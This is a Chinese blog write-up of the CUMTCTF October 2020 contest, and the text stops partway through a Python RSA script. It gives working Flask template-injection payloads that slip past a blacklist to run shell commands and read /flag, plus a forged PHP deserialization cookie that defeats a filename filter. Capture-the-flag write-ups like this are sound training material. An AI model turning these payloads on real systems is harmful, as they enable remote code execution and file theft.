<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.2.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/bug-ddblog-punish/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/bug-ddblog-punish/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/bug-ddblog-punish/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/bug-ddblog-punish/images/logo.svg" color="#222">

<link rel="stylesheet" href="/bug-ddblog-punish/css/main.css">


<link rel="stylesheet" href="/bug-ddblog-punish/lib/font-awesome/css/all.min.css">
  <link rel="stylesheet" href="/bug-ddblog-punish/lib/pace/pace-theme-center-atom.min.css">
  <script src="/bug-ddblog-punish/lib/pace/pace.min.js"></script>

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"giant-whale.gitee.io","root":"/bug-ddblog-punish/","scheme":"Mist","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":true,"show_result":true,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="CUMTCTF 2020年10月赛">
<meta property="og:type" content="article">
<meta property="og:title" content="CUMTCTF 2020 10">
<meta property="og:url" content="https://giant-whale.gitee.io/bug-ddblog-punish/p/13758/index.html">
<meta property="og:site_name" content="bugDD">
<meta property="og:description" content="CUMTCTF 2020年10月赛">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://i.loli.net/2020/10/23/nQplKMOwVfzWXZx.png">
<meta property="og:image" content="https://i.loli.net/2020/10/23/PAJZ4HK7WeXUaLm.png">
<meta property="og:image" content="https://i.loli.net/2020/10/23/mGUkRplWQwC7uEK.png">
<meta property="og:image" content="https://i.loli.net/2020/10/23/BOj35EozyAemGlb.png">
<meta property="og:image" content="https://i.loli.net/2020/10/23/7z1Yib6TrqFN2mu.png">
<meta property="og:image" content="https://i.loli.net/2020/10/23/siIXVmhAL7y6lDR.png">
<meta property="og:image" content="https://i.loli.net/2020/10/23/Jkj47tW1AXqlczy.png">
<meta property="og:image" content="https://i.loli.net/2020/10/23/PJFjd19moLwln5f.png">
<meta property="og:image" content="https://i.loli.net/2020/10/23/C2B35ROsk71fqJI.png">
<meta property="og:image" content="https://i.loli.net/2020/10/23/sEpWHylrx7LkgMX.png">
<meta property="og:image" content="https://i.loli.net/2020/10/23/YcKRhFH4aQkPbus.png">
<meta property="og:image" content="https://i.loli.net/2020/10/23/C4gP8vHycBXS9NE.png">
<meta property="og:image" content="https://i.loli.net/2020/10/23/d57g3ShwsVeakG8.png">
<meta property="og:image" content="https://i.loli.net/2020/10/23/1J5v6g9OzXcuVdA.png">
<meta property="og:image" content="https://i.loli.net/2020/10/23/zDbGOlgAhUfoZnd.png">
<meta property="article:published_time" content="2020-10-23T04:51:14.000Z">
<meta property="article:modified_time" content="2020-10-23T14:38:10.062Z">
<meta property="article:author" content="Zhou Hao">
<meta property="article:tag" content="CUMTCTF">
<meta property="article:tag" content="Writeup">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://i.loli.net/2020/10/23/nQplKMOwVfzWXZx.png">

<link rel="canonical" href="https://giant-whale.gitee.io/bug-ddblog-punish/p/13758/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>CUMTCTF 2020 10 | bugDD</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/bug-ddblog-punish/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">bugDD</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">bugDD Blog</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/bug-ddblog-punish/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/bug-ddblog-punish/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>
  <div class="reading-progress-bar"></div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://giant-whale.gitee.io/bug-ddblog-punish/p/13758/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/bug-ddblog-punish/images/avatar.gif">
      <meta itemprop="name" content="Zhou Hao">
      <meta itemprop="description" content="bugDD的日常总结">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="bugDD">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          CUMTCTF 2020 10
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>
              

              <time title="创建时间：2020-10-23 12:51:14 / 修改时间：22:38:10" itemprop="dateCreated datePublished" datetime="2020-10-23T12:51:14+08:00">2020-10-23</time>
            </span>

          
            <div class="post-description">CUMTCTF 2020年10月赛</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h2 id="Web"><a href="#Web" class="headerlink" title="Web"></a>Web</h2><h3 id="babyflask"><a href="#babyflask" class="headerlink" title="babyflask"></a>babyflask</h3><blockquote>
<p>Author: 周浩</p>
</blockquote>
<p>题目可以看出这是一个Python Web框架Flask，考虑模板注入。</p>
<p>在url后加入</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#123;&#123; 1 + 1 &#125;&#125;</span><br></pre></td></tr></table></figure>

<p>返回：</p>
<p><img src="https://i.loli.net/2020/10/23/nQplKMOwVfzWXZx.png" alt="image-20201023125349539"></p>
<p>显然，这存在模板注入，考虑构造Payload为：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&#39;&#39;.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__[&#39;os&#39;].system(&#39;ls&#39;)</span><br></pre></td></tr></table></figure>

<p>返回：</p>
<p><img src="https://i.loli.net/2020/10/23/PAJZ4HK7WeXUaLm.png" alt="image-20201023125549865"></p>
<p>说明存在检测或者过滤，不断尝试发现<strong>eval</strong>、<strong>os</strong>等都在黑名单内，由于<strong>eval</strong>在黑名单内，首先我们要考虑取到<strong>eval</strong>函数对象。</p>
<p>我们通过get函数传入加一个编码的<strong>eval</strong>字符绕过黑名单，成功拿到<strong>eval</strong>函数对象，对应payload:</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">%7B%7B&#39;&#39;.__class__.__mro__.__getitem__(2).__subclasses__().pop(59).__init__.__globals__.__builtins__.get(&#39;\u0065\u0076\u0061\u006c&#39;)</span><br></pre></td></tr></table></figure>

<p>同理将<strong>eval</strong>的具体语句通过编码绕过，成功执行ls命令查看到当前目录的文件，对应payload：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">%7B%7B&#39;&#39;.__class__.__mro__.__getitem__(2).__subclasses__().pop(59).__init__.__globals__.__builtins__.get(&#39;\u0065\u0076\u0061\u006c&#39;)(&quot;__\u0069\u006d\u0070\u006f\u0072\u0074__(&#39;\u006f\u0073&#39;).popen(&#39;ls%20&#39;).read()&quot;)%7D%7D</span><br></pre></td></tr></table></figure>

<p>在查看app.py后发现了FakeFlag。</p>
<p>最终在根目录下找到了flag文件，将执行命令改为cat /flag即可拿到Flag。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">%7B%7B&#39;&#39;.__class__.__mro__.__getitem__(2).__subclasses__().pop(59).__init__.__globals__.__builtins__.get(&#39;\u0065\u0076\u0061\u006c&#39;)(&quot;__\u0069\u006d\u0070\u006f\u0072\u0074__(&#39;\u006f\u0073&#39;).popen(&#39;cat%20&#x2F;flag&#39;).read()&quot;)%7D%7D</span><br></pre></td></tr></table></figure>

<p>至此，拿到了Flag。</p>
<h3 id="doge"><a href="#doge" class="headerlink" title="doge"></a>doge</h3><blockquote>
<p>Author: 周浩、钟昌甫</p>
</blockquote>
<p>查看源代码，拿到对应的<strong>aaencode</strong>的JS代码，解码后得到实际代码为：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br></pre></td><td class="code"><pre><span class="line">        <span class="keyword">var</span> isBegin = <span class="literal">false</span>;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">numRand</span>(<span class="params"></span>) </span>&#123;</span><br><span class="line">    <span class="keyword">var</span> x = <span class="number">9999</span>;</span><br><span class="line">    <span class="keyword">var</span> y = <span class="number">1000</span>;</span><br><span class="line">    <span class="keyword">var</span> rand = <span class="built_in">parseInt</span>(<span class="built_in">Math</span>.random() * (x - y + <span class="number">1</span>) + y);</span><br><span class="line">    <span class="keyword">return</span> rand;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">isPrimeNum</span>(<span class="params">num</span>) </span>&#123;</span><br><span class="line">    <span class="keyword">return</span> !<span class="regexp">/^.?$|^(..+?)\1+$/</span>.test(<span class="built_in">Array</span>(num + <span class="number">1</span>).join(<span class="string">&#x27;1&#x27;</span>))</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">check</span>(<span class="params">num</span>) </span>&#123;</span><br><span class="line">    <span class="keyword">if</span> (isPrimeNum(num)) &#123;</span><br><span class="line">        $.ajax(&#123;</span><br><span class="line">            url: <span class="string">&#x27;check.php&#x27;</span>,</span><br><span class="line">            type: <span class="string">&#x27;POST&#x27;</span>,</span><br><span class="line">            data: <span class="string">&#x27;num=&#x27;</span> + num,</span><br><span class="line">            success: <span class="function"><span class="keyword">function</span> (<span class="params">data</span>) </span>&#123;</span><br><span class="line">                alert(data);</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;)</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        alert( <span class="string">&#x27;It seems t&#x27;</span></span><br><span class="line">        +<span class="string">&#x27;hat you are&#x27;</span></span><br><span class="line">        +<span class="string">&#x27; not lucky &#x27;</span></span><br><span class="line">        +<span class="string">&#x27;enough, ple&#x27;</span></span><br><span class="line">        +<span class="string">&#x27;ase keep tr&#x27;</span></span><br><span class="line">        +<span class="string">&#x27;ying.&#x27;</span>)</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">$(<span class="function"><span class="keyword">function</span> (<span class="params"></span>) </span>&#123;</span><br><span class="line">    <span class="keyword">var</span> u = <span class="number">265</span>;</span><br><span class="line">    $(<span class="string">&#x27;.btn&#x27;</span>).click(<span class="function"><span class="keyword">function</span> (<span class="params"></span>) </span>&#123;</span><br><span class="line">        <span class="keyword">if</span> (isBegin) <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">        isBegin = <span class="literal">true</span>;</span><br><span class="line">        $(<span class="string">&quot;.num&quot;</span>).css(<span class="string">&#x27;background-position&#x27;</span>, <span class="string">&#x27;11px 0&#x27;</span>);</span><br><span class="line">        <span class="keyword">var</span> result = numRand();</span><br><span class="line">        <span class="keyword">var</span> num_arr = (result + <span class="string">&#x27;&#x27;</span>).split(<span class="string">&#x27;&#x27;</span>);</span><br><span class="line">        $(<span class="string">&quot;.num&quot;</span>).each(<span class="function"><span class="keyword">function</span> (<span class="params">index</span>) </span>&#123;</span><br><span class="line">            <span class="keyword">var</span> _num = $(<span class="built_in">this</span>);</span><br><span class="line">            <span class="keyword">var</span> yPos = (u * <span class="number">60</span>) - (u * num_arr[index]);</span><br><span class="line">            <span class="built_in">setTimeout</span>(<span class="function"><span class="keyword">function</span> (<span class="params"></span>) </span>&#123;</span><br><span class="line">                _num.animate(&#123;</span><br><span class="line">                    backgroundPosition: <span class="string">&#x27;11px &#x27;</span> + yPos + <span class="string">&#x27;px&#x27;</span></span><br><span class="line">                &#125;, &#123;</span><br><span class="line">                    duration: <span class="number">6000</span> + index * <span class="number">3000</span>,</span><br><span class="line">                    easing: <span class="string">&quot;easeInOutCirc&quot;</span>,</span><br><span class="line">                    complete: <span class="function"><span class="keyword">function</span> (<span class="params"></span>) </span>&#123;</span><br><span class="line">                        <span class="keyword">if</span> (index == <span class="number">3</span>) &#123;</span><br><span class="line">                            isBegin = <span class="literal">false</span>;</span><br><span class="line">                            check(result);</span><br><span class="line">                        &#125;</span><br><span class="line">                    &#125;</span><br><span class="line">                &#125;);</span><br><span class="line">            &#125;, index);</span><br><span class="line">        &#125;);</span><br><span class="line">    &#125;);</span><br><span class="line">&#125;);</span><br></pre></td></tr></table></figure>

<p>审计后发现只需要想check.php发送一个素数即可拿到data，执行以下命令(Power by Windwos PowerShell)：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">curl -Uri http:&#x2F;&#x2F;219.219.61.234:20201&#x2F;check.php -Method Post -Body @&#123;&#39;num&#39;&#x3D;&#39;6857&#39;&#125; | Select-Object Content | Write-Host</span><br></pre></td></tr></table></figure>

<p>返回：</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="selector-tag">@</span>&#123;Content=Y3VtdGN0Znt3M2xjMG1lX3QwX2N1bXRjdGZfQH0=&#125;</span><br></pre></td></tr></table></figure>

<p>进行Base64解码后得到Flag。</p>
<h3 id="Hordor"><a href="#Hordor" class="headerlink" title="Hordor"></a>Hordor</h3><blockquote>
<p>Author: 周浩</p>
</blockquote>
<p>查看网页源代码，发现可以通过发送Get参数source获取源代码，在页面最底下找到了源代码。</p>
<p>源代码：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"></span><br><span class="line">Class Source &#123;</span><br><span class="line">    public function __toString() &#123;</span><br><span class="line">        return highlight_file(&#39;license.txt&#39;, true).highlight_file($this-&gt;source, true);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">function easy_check($str) &#123;</span><br><span class="line">    &#x2F;&#x2F;echo $str;</span><br><span class="line">    if (preg_match(&quot;&#x2F;flag&#x2F;i&quot;, $str, $matches)) &#123;</span><br><span class="line">        return false;</span><br><span class="line">    &#125;</span><br><span class="line">    return true;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">if(isset($_GET[&#39;source&#39;]))&#123;</span><br><span class="line">    $s &#x3D; new Source();</span><br><span class="line">    $s-&gt;source &#x3D; __FILE__;</span><br><span class="line"></span><br><span class="line">    echo $s;</span><br><span class="line">    exit;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$todos &#x3D; [];</span><br><span class="line"></span><br><span class="line">if(isset($_COOKIE[&#39;todos&#39;]))&#123;</span><br><span class="line">    if(!easy_check($_COOKIE[&#39;todos&#39;])) &#123;</span><br><span class="line">        echo &quot;Hacker!\n&quot;;</span><br><span class="line">    &#125; else &#123;</span><br><span class="line">        $c &#x3D; $_COOKIE[&#39;todos&#39;];</span><br><span class="line">        $h &#x3D; substr($c, 0, 32);</span><br><span class="line">        $m &#x3D; substr($c, 32);</span><br><span class="line">        if(md5($m) &#x3D;&#x3D;&#x3D; $h)&#123;</span><br><span class="line">            $todos &#x3D; unserialize($m);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">if(isset($_POST[&#39;text&#39;]))&#123;</span><br><span class="line">    $todo &#x3D; $_POST[&#39;text&#39;];</span><br><span class="line"></span><br><span class="line">    $todos[] &#x3D; $todo;</span><br><span class="line">    $m &#x3D; serialize($todos);</span><br><span class="line">    $h &#x3D; md5($m);</span><br><span class="line"></span><br><span class="line">    setcookie(&#39;todos&#39;, $h.$m);</span><br><span class="line">    header(&#39;Location: &#39;.$_SERVER[&#39;REQUEST_URI&#39;]);</span><br><span class="line">    exit;</span><br><span class="line">&#125;</span><br><span class="line">&#x2F;&#x2F; flag is in flag.php</span><br><span class="line">?&gt;</span><br><span class="line">&lt;html&gt;</span><br><span class="line">&lt;head&gt;</span><br><span class="line">    &lt;style&gt;</span><br><span class="line">    * &#123;font-family: &quot;Comic Sans MS&quot;, cursive, sans-serif&#125;</span><br><span class="line">    &lt;&#x2F;style&gt;</span><br><span class="line">    &lt;link rel&#x3D;&quot;icon&quot; href&#x3D;&quot;.&#x2F;image&#x2F;ico.ico&quot;&gt;</span><br><span class="line">    &lt;title&gt; Hodor &lt;&#x2F;title&gt;</span><br><span class="line">&lt;&#x2F;head&gt;</span><br><span class="line"></span><br><span class="line">&lt;h1&gt;My TODO List&lt;&#x2F;h1&gt;</span><br><span class="line">&lt;!-- To Get Source: ?source --&gt;</span><br><span class="line">&lt;hr style&#x3D;&quot;height:1px;border:none;border-top:1px dashed;&quot;&#x2F;&gt;</span><br><span class="line">&lt;ul&gt;</span><br><span class="line">&lt;?php foreach($todos as $todo):?&gt;</span><br><span class="line">    &lt;li&gt;&lt;?&#x3D;$todo?&gt;&lt;&#x2F;li&gt;</span><br><span class="line">&lt;?php endforeach;?&gt;</span><br><span class="line">&lt;&#x2F;ul&gt;</span><br><span class="line"></span><br><span class="line">&lt;form method&#x3D;&quot;post&quot; href&#x3D;&quot;.&quot;&gt;</span><br><span class="line">    &lt;textarea name&#x3D;&quot;text&quot;&gt;&lt;&#x2F;textarea&gt;</span><br><span class="line">    &lt;input type&#x3D;&quot;submit&quot; value&#x3D;&quot;store&quot;&gt;</span><br><span class="line">&lt;&#x2F;form&gt;</span><br></pre></td></tr></table></figure>

<p>审计源代码发现这是一个反序列化的利用，flag已经指明了就在flag.php文件当中。</p>
<p>从反序列的代码和输出的代码可以肯定的是，反序列化后得到的实例对象必然为一个<strong>Array</strong>对象，因此我们构造以下PHP代码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="class"><span class="keyword">Class</span> <span class="title">Source</span> </span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__toString</span>(<span class="params"></span>) </span>&#123;</span><br><span class="line">        <span class="keyword">return</span> highlight_file(<span class="string">&#x27;test.txt&#x27;</span>, <span class="literal">true</span>).</span><br><span class="line">        highlight_file(<span class="keyword">$this</span>-&gt;source, <span class="literal">true</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$arr = <span class="keyword">Array</span>();</span><br><span class="line"></span><br><span class="line">$o = <span class="keyword">new</span> Source();</span><br><span class="line">$o-&gt;source = <span class="string">&quot;flag.php&quot;</span>;</span><br><span class="line">array_push($arr, $o);</span><br><span class="line"><span class="keyword">echo</span> serialize($o)</span><br></pre></td></tr></table></figure>

<p>得到以下序列化结果：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">a:1:&#123;i:0;O:6:&quot;Source&quot;:1:&#123;s:6:&quot;source&quot;;s:8:&quot;flag.php&quot;;&#125;&#125;</span><br></pre></td></tr></table></figure>

<p>但是题目代码中对flag进行了检测，因此我们需要绕过。</p>
<p>使用%00截断可以绕过该检测，但是同样带来的问题就是文件无法被准确的打开，因此不考虑该方式。</p>
<p>此处使用<strong>大S绕过</strong>，使待序列化的字符串如下：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">a:1:&#123;i:0;O:6:\&quot;Source\&quot;:1:&#123;s:6:\&quot;source\&quot;;S:8:\&quot;\\66\\6c\\61\\67\\2e\\70\\68\\70\&quot;;&#125;&#125;</span><br></pre></td></tr></table></figure>

<p>写PHP脚本如下：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">$str = <span class="string">&quot;a:1:&#123;i:0;O:6:\&quot;Source\&quot;:1:&#123;s:6:\&quot;source\&quot;;S:8:\&quot;\\66\\6c\\61\\67\\2e\\70\\68\\70\&quot;;&#125;&#125;&quot;</span>;</span><br><span class="line"></span><br><span class="line">setcookie(<span class="string">&#x27;todos&#x27;</span>, md5($str).$str);</span><br></pre></td></tr></table></figure>

<p>附上最后的cookie：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">a170de677c96a2097c4d580cea16e0cba%3A1%3A%7Bi%3A0%3BO%3A6%3A%22Source%22%3A1%3A%7Bs%3A6%3A%22source%22%3BS%3A8%3A%22%5C66%5C6c%5C61%5C67%5C2e%5C70%5C68%5C70%22%3B%7D%7D</span><br></pre></td></tr></table></figure>

<p>修改cookie为该值拿到Flag。</p>
<h2 id="Crypto"><a href="#Crypto" class="headerlink" title="Crypto"></a>Crypto</h2><h3 id="Classical"><a href="#Classical" class="headerlink" title="Classical"></a>Classical</h3><blockquote>
<p>Author: 周浩</p>
</blockquote>
<p>网站：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https:&#x2F;&#x2F;www.guballa.de&#x2F;vigenere-solver</span><br></pre></td></tr></table></figure>

<p>放入进行Crack，Language选择English，最终得到Flag。</p>
<h3 id="ezRSA"><a href="#ezRSA" class="headerlink" title="ezRSA"></a>ezRSA</h3><blockquote>
<p>Author: 周浩</p>
</blockquote>
<p>使用RSA维纳攻击(<strong>RSAwienerHacker</strong>)即可得到最终Flag。</p>
<p>对RSAwienerHacker.py进行一下修改，具体代码如下：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string">Created on Dec 14, 2011</span></span><br><span class="line"><span 